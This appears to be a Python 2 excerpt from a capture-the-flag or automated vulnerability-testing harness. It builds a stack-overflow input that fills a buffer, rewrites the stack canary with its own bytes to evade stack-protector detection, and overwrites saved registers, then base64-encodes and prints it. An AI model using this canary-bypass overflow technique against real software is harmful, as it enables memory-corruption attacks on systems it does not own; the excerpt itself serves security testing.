# Build the test input as a single expression. Layout, in order:
#   1. filler that occupies the whole buffer (buffer_size bytes)
#   2. the first 4 bytes of the canary value (the original author notes
#      the check only ever covers 4 bytes)
#   3. filler for the remainder of the canary area; the offset is
#      multiplied by -1, so it is presumably stored as a negative
#      frame-relative value (confirm where canary_frame is built)
#   4. 'eeee' over the saved registers
#   5. a trailing newline
# NOTE(review): the canary bytes are reproduced unchanged, so a
# stack-protector check would presumably not flag this write; any fault
# would then surface only when the overwritten saved registers are used.
crash_string = (
    "a" * buffer_size
    + canary[:4]
    + "a" * ((canary_frame.offset * -1) - 4)
    + 'eeee'
    + '\n'
)

# Base64-encode the input and log it with the challenge and canary values.
# The code that actually sends it to the service is not in this excerpt.
b64 = base64.b64encode(crash_string)
print chal, canary, crash_string.strip(), b64